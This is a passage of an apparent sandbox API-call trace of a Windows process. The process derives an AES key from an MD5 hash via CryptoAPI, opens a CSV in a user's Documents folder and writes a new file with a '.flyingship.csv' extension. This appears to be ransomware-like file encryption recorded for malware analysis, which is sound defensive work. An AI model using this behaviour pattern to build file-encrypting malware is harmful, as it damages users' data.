wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0180.275] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.275] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0180.275] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.275] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.275] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0180.275] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0180.295] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0180.295] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.295] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.295] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.295] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0180.295] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.295] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0180.297] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.297] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.297] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0180.297] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0180.297] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0180.297] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.297] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.297] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.297] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0180.297] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0180.297] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0180.297] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.297] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.297] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.297] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.297] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0180.297] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.297] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.298] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0180.298] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.298] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0180.298] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0180.298] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.298] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.298] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0180.298] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0180.298] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0180.298] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.298] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.298] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.298] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.298] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0180.298] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0180.298] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0180.298] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.298] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0180.298] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.298] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.299] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.299] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.299] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0180.299] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.299] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.299] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.299] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0180.299] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.299] CryptHashData (hHash=0x90ae18, pbData=0x8df1e0, dwDataLen=0x19, dwFlags=0x1) returned 1 [0180.299] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.299] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.299] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.299] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.299] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0180.299] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0180.299] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0180.299] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.299] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0180.300] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.300] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.300] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.300] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.300] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.300] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.300] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0180.300] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.300] CryptDestroyHash (hHash=0x90ae18) returned 1 [0180.300] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.300] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.300] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.300] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.300] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.301] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zw2wea8 qxa.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0180.302] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.302] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0180.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0180.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0180.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0180.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0180.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0180.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0180.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0180.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0180.302] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0180.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0180.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0180.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0180.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0180.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0180.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0180.303] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0180.303] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0180.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0180.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0180.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0180.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0180.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0180.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0180.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0180.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0180.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0180.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0180.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0180.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0180.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0180.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0180.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0180.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0180.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0180.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0180.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0180.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0180.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0180.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0180.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0180.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0180.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0180.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0180.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0180.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0180.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0180.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0180.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0180.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0180.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0180.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0180.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0180.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0180.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0180.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0180.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0180.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0180.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0180.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0180.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d78 [0180.305] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0180.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0180.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0180.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0180.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0180.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0180.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0180.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0180.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0180.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0180.305] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.flyingship.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zw2wea8 qxa.flyingship.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0180.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0180.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0180.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0180.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0180.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0180.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0180.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0180.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0180.307] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0180.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0180.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0180.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0180.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0180.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0180.307] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0180.307] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0180.307] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0180.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0180.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0180.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0180.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0180.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0180.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0180.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0180.308] 